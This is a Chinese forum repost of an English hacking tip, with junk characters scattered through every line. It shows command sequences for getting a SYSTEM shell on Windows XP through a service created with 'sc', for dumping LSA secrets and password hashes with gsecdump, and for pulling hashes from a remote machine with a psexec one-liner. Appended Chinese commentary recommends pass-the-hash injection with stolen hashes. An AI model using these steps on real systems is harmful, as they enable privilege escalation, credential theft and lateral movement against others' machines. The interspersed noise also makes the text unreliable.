o get a DOS Prompt as NT system:
- G2 [. @9 J( u; G" R
. M1 U6 t' Y, k! Y3 u8 lC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact: X4 u( @/ G7 O C/ t. x
[SC] CreateService SUCCESS
/ l3 a+ J# K6 X6 b& y3 u" a! f% Q, O' `* g+ y+ b
C:\>sc start shellcmdline7 _# U# L) y J$ _# c
[SC] StartService FAILED 1053:# _! _- r0 u! ?3 v/ ~
, r2 ?/ [# g! N9 s3 q7 B
The service did not respond to the start or control request in a timely fashion.
; z1 U* ? V l7 Y& [, F$ F
{& R0 u& X6 f. H2 w+ K1 AC:\>sc delete shellcmdline
2 b' _' d( Y3 j& E' O* Y[SC] DeleteService SUCCESS
! U. H& n( I" U0 e) L& G% ^
9 D- E: W7 V2 p# M+ d------------( R# b4 V/ ]) \2 }
6 c# q: m$ c3 P/ x/ JThen in the new DOS window:7 r1 T; A1 q! O$ |
' S9 }, v$ A. \4 o- o* [ nMicrosoft Windows XP [Version 5.1.2600]1 D+ Z; s2 W6 p( a. T
(C) Copyright 1985-2001 Microsoft Corp.
$ l! ?3 {+ J9 A+ a, S: K$ @' V: j
C:\WINDOWS\system32>whoami
7 A" Z, X$ ~- A/ QNT AUTHORITY\SYSTEM, s$ ^. T/ B5 h: N$ S2 A; y3 o
& e6 }) R/ v( p/ p+ e
C:\WINDOWS\system32>gsecdump -h3 @" ?- p- H% Z Q6 ~
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
3 `0 Y. ]1 T5 K. ^8 c& Xusage: gsecdump [options]
- a! t0 {8 h! u" v, r
- W, g: D& S3 Zoptions:, ?$ l0 p0 V" s5 i9 o, S
-h [ --help ] show help
: \( z) b7 A$ i: v, ]" C5 q-a [ --dump_all ] dump all secrets- x: }& ^7 l1 M0 A8 G
-l [ --dump_lsa ] dump lsa secrets
) _6 `. E" i& C' e-w [ --dump_wireless ] dump microsoft wireless connections. Q# L* W& G! \* ~: q: }# O. @
-u [ --dump_usedhashes ] dump hashes from active logon sessions9 T& j0 ^- i" Y6 Q4 n2 k
-s [ --dump_hashes ] dump hashes from SAM/AD1 K: x; E' G, D' s3 ^9 s
8 S! O9 t5 G v* q9 S. u& r( z$ ^0 Q/ EAlthough I like to use:
+ s- t/ t; V; c! {4 L( E: S" ^/ v2 Z0 |, L$ Q! k
PsExec v1.83 - Execute processes remotely9 X$ l1 u6 Z+ |3 y9 z R( b* S
Copyright (C) 2001-2007 Mark Russinovich1 }! N/ M1 b& |! y& t: C
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
- |, v! d: r N1 ]
$ a& f% o6 E v" @; MC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT, w% T% _" [) c" `
8 A4 k% Q* n/ q9 e. v
to get the hashes from active logon sessions of a remote system.4 i3 h2 y4 c0 D4 ]8 j
& R* X$ C$ C, d
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables." l$ \# m2 L+ u# ?- a
6 N! P% s% c; s: r" y& a' W% ~提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
( n# U" d8 I% c# G* T原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]8 G& b, A q6 x) m/ h
" V8 ?9 i+ e. }5 V7 @9 _! W
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
8 q" o; A J& o* W: v. p C |
发表于 2012-11-6 21:09:29
收藏
支持
反对